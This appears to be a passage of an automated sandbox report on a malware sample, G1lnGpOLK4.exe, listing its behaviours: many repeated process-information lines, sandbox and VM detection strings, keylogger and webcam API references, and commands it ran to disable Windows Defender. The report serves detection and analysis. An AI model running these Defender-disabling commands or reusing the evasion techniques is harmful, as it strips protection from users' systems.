Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: G1lnGpOLK4.exe, 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, G1lnGpOLK4.exe, 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: WIRESHARK.EXECHTTPS://PASTEBIN.COM/RAW/S4TIPMJTNULL
Source: G1lnGpOLK4.exe, 00000000.00000002.4072983013.00000000030A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE

Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Memory allocated: EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Memory allocated: 30A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Memory allocated: 1B0A0000 memory commit \| memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Window / User API: threadDelayed 3584	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Window / User API: threadDelayed 5709	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Window / User API: foregroundWindowGot 1776	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6366	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3314	Jump to behavior

Source: C:\Users\user\Desktop\G1lnGpOLK4.exe TID: 2484	Thread sleep count: 155 > 30	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe TID: 2484	Thread sleep time: -155000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe TID: 8128	Thread sleep count: 3584 > 30	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe TID: 2484	Thread sleep count: 5709 > 30	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe TID: 2484	Thread sleep time: -5709000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048	Thread sleep count: 6366 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048	Thread sleep count: 3314 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8160	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: G1lnGpOLK4.exe, 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: VBoxService%\\.\PhysicalDrive0
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\G1lnGpOLK4.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, kl.cs	Reference to suspicious API methods: MapVirtualKey(a, 0u)
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, kl.cs	Reference to suspicious API methods: GetAsyncKeyState(num2)
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, OK.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)

Disables Windows Defender (via service or powershell)

Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop windefend
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true	Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop windefend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true	Jump to behavior

Modifies Windows Defender protection settings

Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query windefend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop windefend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete windefend	Jump to behavior

Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager.3.16
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerrok.ioH
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerrok.ioM
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, G1lnGpOLK4.exe, 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, G1lnGpOLK4.exe, 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager b
Source: G1lnGpOLK4.exe, 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, G1lnGpOLK4.exe, 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: Progman
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managero
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager0
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerm
Source: G1lnGpOLK4.exe, 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, G1lnGpOLK4.exe, 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd+set CDAudio door open/set CDAudio door closed
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managermk.ioe
Source: G1lnGpOLK4.exe, 00000000.00000002.4072983013.000000000318B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerx
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerrok.io\|
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managero?
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager@
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager`[
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerrok.io
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager\|
Source: G1lnGpOLK4.exe, 00000000.00000002.4071932100.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerYQ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
